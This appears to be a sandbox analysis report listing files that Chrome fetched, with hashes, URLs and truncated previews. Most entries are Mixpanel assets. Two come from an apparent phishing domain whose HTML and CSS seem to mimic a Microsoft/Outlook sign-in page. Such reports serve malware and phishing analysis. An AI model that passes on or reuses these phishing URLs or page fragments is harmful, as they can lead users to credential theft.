                                                                            Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (11605)
                                                                            Category:downloaded
                                                                            Size (bytes):290762
                                                                            Entropy (8bit):5.323516738760414
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:78E928817AB159667E053DC02192A788
                                                                            SHA1:00BBB330AC3CE4BE52198EA21FA97E79E1B9EC73
                                                                            SHA-256:B22610EEC8089386F900F39218AA1784E20D9CF652BED440A734F0FEF8287B3A
                                                                            SHA-512:DAD2D6434EC07EDD3D6E78BF5F6EE2ECC5D54DAC8FB80A53F60755D99F070E89EA9EF6F45C6495DA90FF652EB19E2E30C803A3C1CD07384BD9EE03BDD5E2CB72
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/9fc54a1acdf60168dc81/boards.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="26be3b9c-a9f4-4c57-9cc3-d4b577d8b947",e._sentryDebugIdIdentifier="sentry-dbid-26be3b9c-a9f4-4c57-9cc3-d4b577d8b947")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (728)
                                                                            Category:downloaded
                                                                            Size (bytes):73070
                                                                            Entropy (8bit):5.331286924778763
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:184F4EF693B491400AE06A2F01A9FD1F
                                                                            SHA1:566ED1712576FF82A0EBFEDA1DAD8B0908C3B4FF
                                                                            SHA-256:37E3B8B29BF40487C576814BFDFDBC4705B5354B0A415A4E1304FCE123E44B8A
                                                                            SHA-512:6FADDED0BFEA3CCE00DF1C594EDB9CB7A7D488242CBBD6172E0BDE11F64760D464BD16EA488A61637C2C6376352B7DFE584D1CDD278A3C17387E50AD17771C64
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mixpanel.com/libs/mixpanel.dev.min.js
                                                                            Preview:(function() {.var j=void 0,k=!0,r=null,B=!1;function W(){return function(){}}.(function(){function ub(){function a(){if(!a.pd)La=a.pd=k,Ma=B,c.a(J,function(a){a.Tc()})}function b(){try{u.documentElement.doScroll("left")}catch(d){setTimeout(b,1);return}a()}if(u.addEventListener)"complete"===u.readyState?a():u.addEventListener("DOMContentLoaded",a,B);else if(u.attachEvent){u.attachEvent("onreadystatechange",a);var d=B;try{d=i.frameElement===r}catch(n){}u.documentElement.doScroll&&d&&b()}c.uc(i,"load",a,k)}function vb(){y.init=function(a,b,d){if(d)return y[d]||(y[d]=J[d]=da(a,.b,d),y[d].ua()),y[d];d=y;if(J.mixpanel)d=J.mixpanel;else if(a)d=da(a,b,"mixpanel"),d.ua(),J.mixpanel=d;y=d;1===sa&&(i.mixpanel=y);wb()}}function wb(){c.a(J,function(a,b){"mixpanel"!==b&&(y[b]=a)});y._=c}function ta(a){a=c.g(a)?a:c.e(a)?{}:{days:a};return c.extend({},xb,a)}function da(a,b,d){var n,f="mixpanel"===d?y:y[d];if(f&&0===sa)n=f;else{if(f&&!c.isArray(f)){s.error("You have already initialized "+d);return}n=ne
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):270250
                                                                            Entropy (8bit):5.391117952035143
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:9BB21A1E939D28968B9F25CBAEFA2B6D
                                                                            SHA1:789034451752948DAE07D4437FD4E519B905048E
                                                                            SHA-256:A5B5E1F10F5CD9B0FEA091A8CC5B8473A04E0B052062D263B2B3AFEDB2ADED2C
                                                                            SHA-512:1830F25F8830F84A0DFE44181A1E80A06508DCDD75E9E3D61A5CBAF16C016A8AF8B5DB1DFF745655E2A4BAB1FD963FEEC949321EA5529719D71D439D417776D0
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/85c7228ae40a031f663b/common/iron.min.css
                                                                            Preview::root{--gray0:#fff;--gray1:#f6f6f6;--gray2:#e9e9e9;--gray3:#8f8f91;--gray4:#626266;--gray5:#2a2a2f;--gray0-rgb:255,255,255;--gray1-rgb:246,246,246;--gray2-rgb:233,233,233;--gray3-rgb:143,143,145;--gray4-rgb:98,98,102;--gray5-rgb:42,42,47;--white:#fff;--blue1:#4f44e0;--blue2:#463dbb;--blue3:#322e6f;--green1:#219464;--green2:#217d57;--green3:#204e3e;--red1:#e34f2f;--red2:#bc452d;--red3:#6d3228;--orange1:#df7800;--orange2:#b96607;--orange3:#6c4316;--blue1-rgb:79,68,224;--blue2-rgb:70,61,187;--blue3-rgb:50,46,111;--green1-rgb:33,148,100;--green2-rgb:33,125,87;--green3-rgb:32,78,62;--red1-rgb:227,79,47;--red2-rgb:188,69,45;--red3-rgb:109,50,40;--orange1-rgb:223,120,0;--orange2-rgb:185,102,7;--orange3-rgb:108,67,22;--text-highlight-color:#accef7;--text-editor-highlight-rgb:79,68,224;--chrome-color:#4f44e0;--chrome-active-color:#322e6f;--chrome-demo-banner-color:#463dbb;--chrome-hover-color:#463dbb;--chrome-search-bar-color:#463dbb;--chrome-text-color:#e9e9e9;--chrome-text-placeholder-color:#
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):19
                                                                            Entropy (8bit):3.6818808028034042
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:595E88012A6521AAE3E12CBEBE76EB9E
                                                                            SHA1:DA3968197E7BF67AA45A77515B52BA2710C5FC34
                                                                            SHA-256:B16E15764B8BC06C5C3F9F19BC8B99FA48E7894AA5A6CCDAD65DA49BBF564793
                                                                            SHA-512:FD13C580D15CC5E8B87D97EAD633209930E00E85C113C776088E246B47F140EFE99BDF6AB02070677445DB65410F7E62EC23C71182F9F78E9D0E1B9F7FDA0DC3
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:404 page not found.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (613)
                                                                            Category:downloaded
                                                                            Size (bytes):50674
                                                                            Entropy (8bit):5.1756517807021405
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:C7094438C72DA67E940F71EBD3E9FD0D
                                                                            SHA1:5B6560DD13D20F6C69B6DF6B845CCD49E015EE04
                                                                            SHA-256:FA62BA58575814E39024EFD5C6D9C1992C0857021720997928DA48795ED8BD46
                                                                            SHA-512:2521E485123BC4E669B280CDE59842A4E06EC9F40E3C2000F77DF555F0227AA52FB0F4BBA7FCECF3A2B23897FCAF6FD3965E2DD6109C929D5E410D93BF3C7D84
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/4504dcb811f563fa4254/vendors-node_modules_tanstack_query-core_build_modern_queryClient_js-node_modules_tanstack_re-e052ee.min.js
                                                                            Preview:try{let t="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},e=(new t.Error).stack.e&&(t._sentryDebugIds=t._sentryDebugIds||{},t._sentryDebugIds[e]="106507d8-ab2f-4c11-92ff-05afa72d9a35",t._sentryDebugIdIdentifier="sentry-dbid-106507d8-ab2f-4c11-92ff-05afa72d9a35")}catch(t){}{let t=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.t._sentryModuleMetadata=t._sentryModuleMetadata||{}.t._sentryModuleMetadata[(new t.Error).stack]=Object.assign({},t._sentryModuleMetadata[(new t.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let t=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.t.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):11
                                                                            Entropy (8bit):3.2776134368191165
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:825644F747BAAB2C00E420DBBC39E4B3
                                                                            SHA1:10588307553E766AB3C7D328D948DC6754893CEF
                                                                            SHA-256:7C41B898C5DA0CFA4AA049B65EF50248BCE9A72D24BEF4C723786431921B75AA
                                                                            SHA-512:BFE6E8DF36C78CBFD17BA9270C86860EE9B051B82594FB8F34A0ADF6A14E1596D2A9DCDC7EB6857101E1502AFF6FF515A36E8BA6C80DA327BC11831624A5DAEA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:Bad Request
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (2100)
                                                                            Category:downloaded
                                                                            Size (bytes):225629
                                                                            Entropy (8bit):5.333541413955955
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:4CF3CD5271393327A8B62C206F03CDAD
                                                                            SHA1:2472A3A3C7FD7B523CFF3352931A3C5DB930C8D5
                                                                            SHA-256:70D8B4D0CF87FF4D44359C934F38480272CCE7EDB4902B27168694A3635E672C
                                                                            SHA-512:7550F38AE00D86C54F107BF70C3E4546E3E98415F270F8DC0A629543075239334E1977BB2AC56379EDB9F44FF393FB7A56B35742A483FD0139797864BB711D67
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/953ceaf2a3a124407252/core-report.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="33a3e2d1-e996-4b7c-afd8-eb0a69721175",e._sentryDebugIdIdentifier="sentry-dbid-33a3e2d1-e996-4b7c-afd8-eb0a69721175")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (52009), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):150672
                                                                            Entropy (8bit):5.939123710418225
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:23ADD15D87DC3E406BF393288EA28AEB
                                                                            SHA1:6B17B48FB09182062DD186CC64036B796EF86675
                                                                            SHA-256:94DDDA290D4A78A5201EF3B146DA65B71DB09E234228E5EFA08B681043BE9780
                                                                            SHA-512:3BE1C984BED54A3F5953B369CA3C61AC982B859372C385F8B381A1526D64869EBCC902F4B12F1186AD1601F1946B24C76682BDD4CFBE7318D28A6A2C6C0309AB
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFN
                                                                            Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):1132
                                                                            Entropy (8bit):6.82846109223061
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5162F38C41B4CED533818A5DE5F9FDF7
                                                                            SHA1:47970784FCE1CABC622C8E4DDFD019524F42A803
                                                                            SHA-256:DA4A6026722384566F3E7C35C09017D8994977526BDDC3630A85BA5A48E17EA3
                                                                            SHA-512:853244304FE68815DBFB1E864A227DD0734DCCD58A227FEFC0C67D5480FB25BF1E0F67C85E970C3078D9B4F69421976DC8DE57FE5CFC22C2AD454B3DC407AB7F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/marketing-site/static/favicons/favicon-32x32.png
                                                                            Preview:.PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<.../PLTE...xU.yU.zV....yU..@.xV.xV.wV.yW.xV.wU..`..U.xV.vW.{U.xV.wV.qU.wV.wV.yV.xV.yU.xU.xV.yU.xZ.xV.xV....xV.xV.wW.xW.xV.xV.xW.xU.wV.wU.xV.xV.ff.xV.xV.xU.zX.xV.xV.xW.xV.xV.wU.xV.vR.vN.yV.xV..P.wW.xV.yV.uU.yV.xV.xV.{X.wU.xV.xW.xU.wW.yX.yU.xV.wU.xV.sY.xU.xW.xV.xV.wW.wW.mI.wW..M.xW.xV.wV.yV.xV.xV.xV.UU.xV.xV.....)....ctRNS.fcA.?.......).....ze.T..]......I5...{.......$C..d..K......g.;.....x...O=......U..m../.......}..5.....bKGDd.......pHYs............'....tIME........)Af....IDAT8..Y?.@.."....CP...RF.^Kk..w....=..d../.O...d...h.j..4.!.%......S........mDcp.%.{.z..?.G !i.4..".kH.0hD..Q....q... ..&.NAOi..0....Nk..92.^ ....Z\Z........i2.l..:c.K.............M..........tv..|.>...8.r..>.v.@.fY...S...wv..*.\\*.2..$].*J..VU...6.+........Gx|....x...y2.N.V. ......Q_..P=e......%tEXtdate:create.2023-03-29T20:26:04+00:00..:...%tEXtdate:modify.2023-03-29T20:26:04+00:00..B.....tEXtSoftware
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1563)
                                                                            Category:downloaded
                                                                            Size (bytes):23645
                                                                            Entropy (8bit):5.474848388904137
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:10C3A5007AAC0AC712EFBDD1965912A4
                                                                            SHA1:CCD47FF666F38982945E371DF26B10B8D949FF2F
                                                                            SHA-256:71E1871C8327AB184ADEFE113BE74D6A836045595E68A2CAF5E2B29A090120B8
                                                                            SHA-512:52DE4D1761FD380C50A44B03317A5E94C70CC563CC2454B3C5BE80853302655B93352601530ED02964E7FC20E3B50699CD7CB525E6E27CBC8005EC4217DE101E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/5f4e5d0ba0b197b7ed2f/iron_apps_boards_src_dashboards-app_util_ts-iron_common_report_flows_util_index_ts-iron_commo-b77837.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="59ee3ba7-7539-4ebf-8f5d-fbb41794471d",e._sentryDebugIdIdentifier="sentry-dbid-59ee3ba7-7539-4ebf-8f5d-fbb41794471d")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (28098)
                                                                            Category:downloaded
                                                                            Size (bytes):28147
                                                                            Entropy (8bit):4.918699570784707
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:137994BEA5B5558D20DEE8B39B9FD9C8
                                                                            SHA1:EEA7E1BC023BCD740C92FBBA52459DB72B18A426
                                                                            SHA-256:C79008CB1636A5FD1D179CD2C72A841287F92A49C672C03F22CE51AFB130D9A6
                                                                            SHA-512:A80FBF901FC3DD8939956F4DA5691B90142FC651FBD6D7B3C6A0217C591F339BE9C18B63C85BA8DB3D6BA08C7161BCFF1171A3EA2B10C5D57EA332AE6C76F0F5
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/2d571856f50441663f3b/public-boards.min.css
                                                                            Preview:#logo-header{filter:invert(29%) sepia(67%) saturate(2413%) hue-rotate(236deg) brightness(88%) contrast(85%);margin:77px auto 32px;text-align:center}.mp-23-logo{height:auto;width:126px}.title{font-size:19px;font-weight:400}#mixpanel-app-wrapper{height:100%}.drop-target{display:block;height:100%;width:100%}.drop-target .drop-indicator{background-color:var(--blue1);border-radius:5px;height:4px;opacity:.2;width:100%}.drop-target.center-indicator{align-items:center;display:flex}.drop-target.top-indicator{align-items:flex-end;display:flex}.drop-target.top-indicator .drop-indicator{margin-bottom:10px}.drop-target.bottom-indicator{align-items:flex-start;display:flex}.drop-target.bottom-indicator .drop-indicator{margin-top:10px}.content-adder.footer-theme,.content-adder.inline-theme{border-radius:12px;height:100%}.content-adder.footer-theme mp-select,.content-adder.inline-theme mp-select{border-radius:12px;height:100%;overflow:hidden;width:100%}.content-adder.footer-theme mp-select{color:#8f8f9
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (6931)
                                                                            Category:downloaded
                                                                            Size (bytes):300691
                                                                            Entropy (8bit):5.3282509385228005
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:850C518263B597DC33F80644DB307E7B
                                                                            SHA1:7BB63AC1C7D40F5016EDB1ECF47DD1DCCA3B99AE
                                                                            SHA-256:B5BE7B5DA7378131B7EE73989626D28E79FB98AADD3936DF31D0E05FAE68C5DE
                                                                            SHA-512:B9ABC91F7355D95FE1439D148F055730CCDD80AF9F03DC8EA3FC390DB3C05B9E9A71573EB9B0E7E852245122A3D0C2BB77FB9FFB7B1A898400B17086AC5B92BB
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/c2c1da83a1817ec9778a/iron_common_contexts_react_bookmark-context_ts-iron_common_contexts_react_report-editor-actio-56aebb.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="c3e8543b-0853-49e5-8045-6af9ce40a43c",e._sentryDebugIdIdentifier="sentry-dbid-c3e8543b-0853-49e5-8045-6af9ce40a43c")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:dropped
                                                                            Size (bytes):1298
                                                                            Entropy (8bit):6.665390877423149
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:32CA2081553E969F9FDD4374134521AD
                                                                            SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                            SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                            SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):48316
                                                                            Entropy (8bit):5.6346993394709
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):26765
                                                                            Entropy (8bit):5.114987586674101
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:1A862A89D5633FAC83D763886726740D
                                                                            SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                            SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                            SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/12aNaBkhbtQKolWIvxydkeYP8915
                                                                            Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (346)
                                                                            Category:downloaded
                                                                            Size (bytes):3034
                                                                            Entropy (8bit):5.434906015847617
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:FF9BAF4A197293D58C1393BFA6EF495F
                                                                            SHA1:83E84D193D7319515A4F570A1C95187F9EE4FEBB
                                                                            SHA-256:329C7350471767004FD5EA113A71821E1A87C5CB986E5D0B5AC0D27F2581233B
                                                                            SHA-512:88A040841953055C353B627ED1BB1C51370368A22B46A20B5F28ED144354177B4672F6AFEAF1B7D3876A444F917A681B586BC5986A4919D450206F35638EEF73
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/d3b24e73f4b284a795ab/reports/onload-init.min.js
